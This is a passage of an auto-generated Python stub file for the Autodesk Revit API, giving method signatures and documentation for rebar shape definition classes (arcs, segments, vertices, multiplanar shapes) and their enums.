parameter from the definition. paramId: Id of a parameter in the definition. """ pass def SetParameterDefaultValue(self, paramId, value): """ SetParameterDefaultValue(self: RebarShapeDefinition, paramId: ElementId, value: float) Change the parameter's value as stored in the definition. paramId: Id of a parameter in the definition. value: New value for the parameter. """ pass def SetParameterFormula(self, paramId, formula): """ SetParameterFormula(self: RebarShapeDefinition, paramId: ElementId, formula: str) Associate a formula with the parameter. paramId: Id of a parameter in the definition. formula: The formula expressed as a string. The string is exactly what a user would type into the Family Types dialog, e.g. "Total Length*3.14159*(Bar Diameter/2)*(Bar Diameter/2)" """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Complete = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Report whether the shape definition is fully constrained. Get: Complete(self: RebarShapeDefinition) -> bool """ IsPlanar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Reports whether the shape definition lies within a plane: false if a spiral, true in all other cases. Get: IsPlanar(self: RebarShapeDefinition) -> bool """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeDefinition) -> bool """ class RebarShapeDefinitionByArc(RebarShapeDefinition, IDisposable): """ Definition of a shape whose size and position can determined by a single arc. RebarShapeDefinitionByArc(doc: Document, height: float, pitch: float, baseFinishingTurns: int, topFinishingTurns: int) RebarShapeDefinitionByArc(doc: Document, type: RebarShapeDefinitionByArcType) """ def AddConstraintArcLength(self, paramId): """ AddConstraintArcLength(self: RebarShapeDefinitionByArc, paramId: ElementId) Specify a parameter to drive the arc length of the shape. paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). """ pass def AddConstraintChordLength(self, paramId): """ AddConstraintChordLength(self: RebarShapeDefinitionByArc, paramId: ElementId) Specify a parameter to drive the chord length (the straight-line distance between the endpoints of the arc). paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). """ pass def AddConstraintCircumference(self, paramId, arcRefType): """ AddConstraintCircumference(self: RebarShapeDefinitionByArc, paramId: ElementId, arcRefType: RebarShapeArcReferenceType) Specify a parameter to drive the circumference of the shape. paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). arcRefType: Specify along which circle the circumference is measured--to the interior of the bar, the centerline, or the exterior. """ pass def AddConstraintDiameter(self, paramId, arcRefType): """ AddConstraintDiameter(self: RebarShapeDefinitionByArc, paramId: ElementId, arcRefType: RebarShapeArcReferenceType) Specify a parameter to drive the diameter of the shape. paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). arcRefType: Specify how the diameter should be measured--to the interior of the bend, the centerline of the bar, or the exterior. """ pass def AddConstraintRadius(self, paramId, arcRefType): """ AddConstraintRadius(self: RebarShapeDefinitionByArc, paramId: ElementId, arcRefType: RebarShapeArcReferenceType) Specify a parameter to drive the radius of the shape. paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). arcRefType: Specify how the radius should be measured--to the interior of the bend, the centerline of the bar, or the exterior. """ pass def AddConstraintSagittaLength(self, paramId): """ AddConstraintSagittaLength(self: RebarShapeDefinitionByArc, paramId: ElementId) Specify a parameter to drive the sagittal length (the height of the circular segment, measured perpendicular to the chord). paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). """ pass def Dispose(self): """ Dispose(self: RebarShapeDefinition, A_0: bool) """ pass def GetConstraints(self): """ GetConstraints(self: RebarShapeDefinitionByArc) -> IList[RebarShapeConstraint] Retrieve the list of constraints associated with this definition. Returns: The list of constraints. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeDefinition, disposing: bool) """ pass def SetArcTypeSpiral(self, height, pitch, baseFinishingTurns, topFinishingTurns): """ SetArcTypeSpiral(self: RebarShapeDefinitionByArc, height: float, pitch: float, baseFinishingTurns: int, topFinishingTurns: int) Set the RebarShapeDefinitionByArc.Type property to Spiral. height: The height of the spiral (assuming the spiral is vertical). pitch: The pitch, or vertical distance traveled in one rotation. baseFinishingTurns: The number of finishing turns at the lower end of the spiral. topFinishingTurns: The number of finishing turns at the upper end of the spiral. """ pass def SetConstraints(self, constraints): """ SetConstraints(self: RebarShapeDefinitionByArc, constraints: IList[RebarShapeConstraint]) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, doc, *__args): """ __new__(cls: type, doc: Document, height: float, pitch: float, baseFinishingTurns: int, topFinishingTurns: int) __new__(cls: type, doc: Document, type: RebarShapeDefinitionByArcType) """ pass Type = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Among those rebar shapes defined by an arc, specify which kind. Get: Type(self: RebarShapeDefinitionByArc) -> RebarShapeDefinitionByArcType Set: Type(self: RebarShapeDefinitionByArc) = value """ class RebarShapeDefinitionByArcType(Enum, IComparable, IFormattable, IConvertible): """ A RebarShapeDefinitionByArc takes one of three forms. enum RebarShapeDefinitionByArcType, values: Arc (0), LappedCircle (1), Spiral (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Arc = None LappedCircle = None Spiral = None value__ = None class RebarShapeDefinitionBySegments(RebarShapeDefinition, IDisposable): """ Definition of a shape in terms of one or more straight segments of rebar, with arc bends between the segments. RebarShapeDefinitionBySegments(doc: Document, numberOfSegments: int) """ def AddBendDefaultRadius(self, vertexIndex, turn, angle): """ AddBendDefaultRadius(self: RebarShapeDefinitionBySegments, vertexIndex: int, turn: RebarShapeVertexTurn, angle: RebarShapeBendAngle) Specify a default-radius bend. vertexIndex: Index of the vertex (1 to NumberOfVertices - 2). turn: Specify turn direction (RebarShapeVertexTurn::Left or RebarShapeVertexTurn::Right). angle: Specify whether the bend is acute, obtuse, etc. """ pass def AddBendVariableRadius(self, vertexIndex, turn, angle, paramId, measureIncludingBarThickness): """ AddBendVariableRadius(self: RebarShapeDefinitionBySegments, vertexIndex: int, turn: RebarShapeVertexTurn, angle: RebarShapeBendAngle, paramId: ElementId, measureIncludingBarThickness: bool) Specify a variable-radius bend. vertexIndex: Index of the vertex (1 to NumberOfVertices - 2). turn: Specify turn direction (RebarShapeVertexTurn::Left or RebarShapeVertexTurn::Right). angle: Specify whether the bend is acute, obtuse, etc. paramId: Id of a parameter driving the radius. measureIncludingBarThickness: If true, the radius is measured to the outside of the bend; if false, it is measured to the inside. """ pass def AddConstraintParallelToSegment(self, iSegment, paramId, measureToOutsideOfBend0, measureToOutsideOfBend1): """ AddConstraintParallelToSegment(self: RebarShapeDefinitionBySegments, iSegment: int, paramId: ElementId, measureToOutsideOfBend0: bool, measureToOutsideOfBend1: bool) Constrain the length of a segment by parameterizing its length. iSegment: Index of the segment (0 to NumberOfSegments - 1). paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). measureToOutsideOfBend0: Choose between two possibilities for the first reference of the length dimension. If false, the reference is at the point where the bend begins; equivalently, at the projection of the bend centerpoint onto the segment. If true, the reference is moved outward by a distance equal to the bend radius plus the bar diameter; if the bend is a right angle or greater, this is equivalent to putting the reference at the outer face of the bend. measureToOutsideOfBend1: Choose between two possibilities for the second reference of the length dimension. """ pass def AddConstraintToSegment(self, iSegment, paramId, constraintDirCoordX, constraintDirCoordY, signOfZCoordOfCrossProductOfConstraintDirBySegmentDir, measureToOutsideOfBend0, measureToOutsideOfBend1): """ AddConstraintToSegment(self: RebarShapeDefinitionBySegments, iSegment: int, paramId: ElementId, constraintDirCoordX: float, constraintDirCoordY: float, signOfZCoordOfCrossProductOfConstraintDirBySegmentDir: int, measureToOutsideOfBend0: bool, measureToOutsideOfBend1: bool) Add a constraint that helps determine the length of a segment. iSegment: Index of the segment (0 to NumberOfSegments - 1). paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). constraintDirCoordX: The x-coordinate of a 2D vector specifying the constraint direction. constraintDirCoordY: The y-coordinate of a 2D vector specifying the constraint direction. signOfZCoordOfCrossProductOfConstraintDirBySegmentDir: Legal values are 1 and -1. For a fixed-direction segment, this value is ignored. For a variable-direction segment, this value is combined with the constraint length (the nonnegative value associated with 'param') to determine the direction of the segment. For example, a segment whose direction vector lies in the upper-right quadrant of the plane, and whose x-axis projected length is A and whose y-axis projected length is B, could be created by calling: AddConstraintToSegment(iSegment, paramA, 1.0, 0.0, 1, ...) AddConstraintToSegment(iSegment, paramB, 0.0, 1.0, -1, ...) measureToOutsideOfBend0: Choose between two possibilities for the first reference of the length dimension. If false, the reference is at the point where the bend begins; equivalently, at the projection of the bend centerpoint onto the segment. If true, the reference is moved outward by a distance equal to the bend radius plus the bar diameter; if the bend is a right angle or greater, this is equivalent to putting the reference at the outer face of the bend. measureToOutsideOfBend1: Choose between two possibilities for the second reference of the length dimension. """ pass def AddListeningDimensionBendToBend(self, paramId, constraintDirCoordX, constraintDirCoordY, iSegment0, iEnd0, iSegment1, iEnd1): """ AddListeningDimensionBendToBend(self: RebarShapeDefinitionBySegments, paramId: ElementId, constraintDirCoordX: float, constraintDirCoordY: float, iSegment0: int, iEnd0: int, iSegment1: int, iEnd1: int) Specify a dimension between two bends, measured by a read-only parameter. paramId: Id of a parameter to report the length of the dimension. The parameter will be read-only on Rebar instances. constraintDirCoordX: The x-coordinate of a 2D vector specifying the constraint direction. constraintDirCoordY: The y-coordinate of a 2D vector specifying the constraint direction. iSegment0: Index of the first segment (0 to NumberOfSegments - 1). iEnd0: End (0 or 1) of the first segment. iSegment1: Index of the second segment (0 to NumberOfSegments - 1). iEnd1: End (0 or 1) of the second segment. """ pass def AddListeningDimensionSegmentToBend(self, paramId, constraintDirCoordX, constraintDirCoordY, iSegment0, iSegment1, iEnd1): """ AddListeningDimensionSegmentToBend(self: RebarShapeDefinitionBySegments, paramId: ElementId, constraintDirCoordX: float, constraintDirCoordY: float, iSegment0: int, iSegment1: int, iEnd1: int) Specify a dimension perpendicular to one fixed-direction segment, referring to that segment and some other bend in the shape, measured by a read-only parameter. paramId: Id of a parameter to report the length of the dimension. The parameter will be read-only on Rebar instances. constraintDirCoordX: The x-coordinate of a 2D vector specifying the constraint direction. constraintDirCoordY: The y-coordinate of a 2D vector specifying the constraint direction. iSegment0: Index of the first segment (0 to NumberOfSegments - 1). iSegment1: Index of the second segment (0 to NumberOfSegments - 1). iEnd1: End (0 or 1) of the second segment. """ pass def AddListeningDimensionSegmentToSegment(self, paramId, constraintDirCoordX, constraintDirCoordY, iSegment0, iSegment1): """ AddListeningDimensionSegmentToSegment(self: RebarShapeDefinitionBySegments, paramId: ElementId, constraintDirCoordX: float, constraintDirCoordY: float, iSegment0: int, iSegment1: int) Specify a dimension perpendicular to two fixed-direction segments, measured by a read-only parameter. paramId: Id of a parameter to report the length of the dimension. The parameter will be read-only on Rebar instances. constraintDirCoordX: The x-coordinate of a 2D vector specifying the constraint direction. constraintDirCoordY: The y-coordinate of a 2D vector specifying the constraint direction. iSegment0: Index of the first segment (0 to NumberOfSegments - 1). iSegment1: Index of the second segment (0 to NumberOfSegments - 1). """ pass def Dispose(self): """ Dispose(self: RebarShapeDefinition, A_0: bool) """ pass def GetSegment(self, segmentIndex): """ GetSegment(self: RebarShapeDefinitionBySegments, segmentIndex: int) -> RebarShapeSegment Return a reference to one of the segments in the definition. segmentIndex: Index of the segment (0 to NumberOfSegments - 1). Returns: The requested segment. """ pass def GetVertex(self, vertexIndex): """ GetVertex(self: RebarShapeDefinitionBySegments, vertexIndex: int) -> RebarShapeVertex Return a reference to one of the vertices in the definition. vertexIndex: Index of the vertex (0 to NumberOfVertices - 1). Returns: The requested vertex. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeDefinition, disposing: bool) """ pass def RemoveParameterFromSegment(self, iSegment, paramId): """ RemoveParameterFromSegment(self: RebarShapeDefinitionBySegments, iSegment: int, paramId: ElementId) Remove constraints from a segment. iSegment: Index of the segment (0 to NumberOfSegments - 1). paramId: Id of a parameter driving one or more constraints. """ pass def SetSegmentAs180DegreeBend(self, iSegment, paramId=None, measureToOutsideOfBend=None): """ SetSegmentAs180DegreeBend(self: RebarShapeDefinitionBySegments, iSegment: int) Indicates that a segment is a "virtual" segment introduced to describe a 180-degree bend. The radius of the bend will be taken from the Bar Type. iSegment: Index of the segment (0 to NumberOfSegments - 1). SetSegmentAs180DegreeBend(self: RebarShapeDefinitionBySegments, iSegment: int, paramId: ElementId, measureToOutsideOfBend: bool) Indicate that a segment is a "virtual" segment introduced to describe a 180-degree bend. The radius of the bend will be driven by radiusParam. iSegment: Index of the segment (0 to NumberOfSegments - 1). paramId: Id of a parameter to drive the radius. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). measureToOutsideOfBend: Choose between two possibilities for the references of the radius dimension. If true, measure to the exterior face of the bar. If false, measure to the interior face. """ pass def SetSegmentFixedDirection(self, iSegment, vecCoordX, vecCoordY): """ SetSegmentFixedDirection(self: RebarShapeDefinitionBySegments, iSegment: int, vecCoordX: float, vecCoordY: float) Fix the direction of a segment. iSegment: Index of the segment (0 to NumberOfSegments - 1). vecCoordX: The x-coordinate of a 2D vector specifying the segment direction. vecCoordY: The y-coordinate of a 2D vector specifying the segment direction. """ pass def SetSegmentVariableDirection(self, iSegment): """ SetSegmentVariableDirection(self: RebarShapeDefinitionBySegments, iSegment: int) Remove the fixed direction from a segment. iSegment: Index of the segment (0 to NumberOfSegments - 1). """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, doc, numberOfSegments): """ __new__(cls: type, doc: Document, numberOfSegments: int) """ pass MajorSegmentIndex = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Index of a segment that can be considered the most important. Revit attempts to preserve the orientation of this segment when a Rebar instance changes its RebarShape to one with a different number of segments. Get: MajorSegmentIndex(self: RebarShapeDefinitionBySegments) -> int Set: MajorSegmentIndex(self: RebarShapeDefinitionBySegments) = value """ NumberOfSegments = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of straight segments in this shape. Get: NumberOfSegments(self: RebarShapeDefinitionBySegments) -> int """ NumberOfVertices = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of vertices in this shape, always equal to NumberOfSegments + 1. Get: NumberOfVertices(self: RebarShapeDefinitionBySegments) -> int """ class RebarShapeMultiplanarDefinition(object, IDisposable): """ A specification for a simple 3D rebar shape. RebarShapeMultiplanarDefinition(outOfPlaneBendDiameter: float) """ def Dispose(self): """ Dispose(self: RebarShapeMultiplanarDefinition) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeMultiplanarDefinition, disposing: bool) """ pass def SetPresenceOfSegments(self, isDuplicateShapePresent, isStartConnectorPresent, isEndConnectorPresent): """ SetPresenceOfSegments(self: RebarShapeMultiplanarDefinition, isDuplicateShapePresent: bool, isStartConnectorPresent: bool, isEndConnectorPresent: bool) Simultaneously set the presence of all 3D segments. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, outOfPlaneBendDiameter): """ __new__(cls: type, outOfPlaneBendDiameter: float) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass DepthParamId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Id of the parameter driving the multiplanar depth. The depth is measured center-to-center of the bar. A valid shape parameter must be assigned to DepthParamId before the MultiplanarDefinition can be used in RebarShape creation. Get: DepthParamId(self: RebarShapeMultiplanarDefinition) -> ElementId Set: DepthParamId(self: RebarShapeMultiplanarDefinition) = value """ IsDuplicateShapePresent = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether the shape definition includes an offset copy of the 2D shape. Get: IsDuplicateShapePresent(self: RebarShapeMultiplanarDefinition) -> bool """ IsEndConnectorPresent = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether a perpendicular segment is constructed from the end of the 2D shape. Get: IsEndConnectorPresent(self: RebarShapeMultiplanarDefinition) -> bool """ IsStartConnectorPresent = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether a perpendicular segment is constructed from the start of the 2D shape. Get: IsStartConnectorPresent(self: RebarShapeMultiplanarDefinition) -> bool """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeMultiplanarDefinition) -> bool """ OutOfPlaneBendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Bend diameter to be applied to the connector segments. Get: OutOfPlaneBendDiameter(self: RebarShapeMultiplanarDefinition) -> float Set: OutOfPlaneBendDiameter(self: RebarShapeMultiplanarDefinition) = value """ class RebarShapeParameters(object, IDisposable): """ Class containing functions that create and retrieve shared parameters for RebarShapes. """ def Dispose(self): """ Dispose(self: RebarShapeParameters) """ pass @staticmethod def GetAllRebarShapeParameters(doc): """ GetAllRebarShapeParameters(doc: Document) -> IList[ElementId] List all shape parameters used by all the existing RebarShapes in the specified document. doc: The document. Returns: ElementIds corresponding to the external parameters. """ pass @staticmethod def GetElementIdForExternalDefinition(doc, externalDefinition): """ GetElementIdForExternalDefinition(doc: Document, externalDefinition: ExternalDefinition) -> ElementId Retrieve the ElementId corresponding to an external rebar shape parameter in the document, if it exists; otherwise, return InvalidElementId. doc: A document. externalDefinition: A shared parameter. Returns: An ElementId representing the shared parameter stored in the document, or InvalidElementId if the parameter is not stored in the document. """ pass @staticmethod def GetExternalDefinitionForElementId(doc, paramId, definitionFile): """ GetExternalDefinitionForElementId(doc: Document, paramId: ElementId, definitionFile: DefinitionFile) -> ExternalDefinition Seach a DefinitionFile for the ExternalDefinition corresponding to a parameter in a document. doc: A document. paramId: The id of a shared parameter in the document. definitionFile: A database of shared parameters. Returns: The external parameter corresponding to the parameter's ElementId, or null if the Id does not correspond to an external parameter, or the parameter is not in the definition file. """ pass @staticmethod def GetOrCreateElementIdForExternalDefinition(doc, externalDefinition): """ GetOrCreateElementIdForExternalDefinition(doc: Document, externalDefinition: ExternalDefinition) -> ElementId Retrieve the ElementId corresponding to an external rebar shape parameter in the document, if it exists; otherwise, add the parameter to the document and generate a new ElementId. doc: A document. externalDefinition: A shared parameter. Returns: An ElementId representing the shared parameter stored in the document. """ pass @staticmethod def IsValidExternalDefinition(param): """ IsValidExternalDefinition(param: ExternalDefinition) -> bool Checks that an ExternalDefinition (shared parameter) may be used as a Rebar Shape parameter. param: Definition of a shared parameter. Returns: True if the definition is of type Length, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeParameters, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeParameters) -> bool """ class RebarShapeSegment(object, IDisposable): """ Part of a RebarShapeDefinitionBySegments, representing one segment of a shape definition. """ def Dispose(self): """ Dispose(self: RebarShapeSegment) """ pass def GetConstraints(self): """ GetConstraints(self: RebarShapeSegment) -> IList[RebarShapeConstraint] Retrieve the list of constraints associated with this segment. Returns: The list of constraints. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeSegment, disposing: bool) """ pass def SetConstraints(self, constraints): """ SetConstraints(self: RebarShapeSegment, constraints: IList[RebarShapeConstraint]) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeSegment) -> bool """ class RebarShapeSegmentEndReferenceType(Enum, IComparable, IFormattable, IConvertible): """ A choice of two reference points for one end of a constraint driving the length of a RebarShapeSegment. enum RebarShapeSegmentEndReferenceType, values: Exterior (1), Straight (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Exterior = None Straight = None value__ = None class RebarShapeVertex(object, IDisposable): """ A bend between segments of a rebar shape definition. """ def Dispose(self): """ Dispose(self: RebarShapeVertex) """ pass def GetConstraints(self): """ GetConstraints(self: RebarShapeVertex) -> IList[RebarShapeConstraint] Retrieve the list of constraints associated with this vertex. Returns: The list of constraints. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeVertex, disposing: bool) """ pass def SetConstraints(self, constraints): """ SetConstraints(self: RebarShapeVertex, constraints: IList[RebarShapeConstraint]) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass BendAngle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The range of permissible angles at this bend. Get: BendAngle(self: RebarShapeVertex) -> RebarShapeBendAngle Set: BendAngle(self: RebarShapeVertex) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeVertex) -> bool """ Turn = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sense of the turn. The Turn property must be set to Left or Right on each internal vertex before the RebarShapeDefinitionBySegments is used. Default is permissible for the first and last vertex, since they do not correspond to bends. Get: Turn(self: RebarShapeVertex) -> RebarShapeVertexTurn Set: Turn(self: RebarShapeVertex) = value """ class RebarShapeVertexTurn(Enum, IComparable, IFormattable, IConvertible): """ Specify whether a bend at a RebarShapeVertex represents a left or right turn. enum RebarShapeVertexTurn, values: Default (0), Left (1), Right (-1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Default = None Left = None Right = None value__ = None class RebarStyle(Enum, IComparable, IFormattable, IConvertible): """ Describes the usage style of a RebarShape. The style affects the bend radius and the set of allowable hooks. It also affects Rebar instance auto-constraining behavior. enum RebarStyle, values: Standard (0), StirrupTie (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Standard = None StirrupTie = None value__ = None class RebarSystemSpanSymbol(IndependentTag, IDisposable): """ Represents a Rebar System Span Symbol element in Autodesk Revit. """ @staticmethod def Create(document, viewId, hostId, point, symbolId): """ Create(document: Document, viewId: ElementId, hostId: LinkElementId, point: XYZ, symbolId: ElementId) -> RebarSystemSpanSymbol Creates a new instance of RebarSystemSpanSymbol in the project. document: The document. viewId: The id of the view in which the symbol should appear. hostId: The ElementId of AreaReinforcement (either in the document, or linked from another document). point: The span symbol's head position. symbolId: The id of the family symbol of this symbol. Returns: A reference to newly created span symbol. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class ReinforcementAbbreviationObjectType(Enum, IComparable, IFormattable, IConvertible): """ Defines the type of desired reinforcement object for abbreviation tags. enum ReinforcementAbbreviationObjectType, values: Area (0), Path (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): 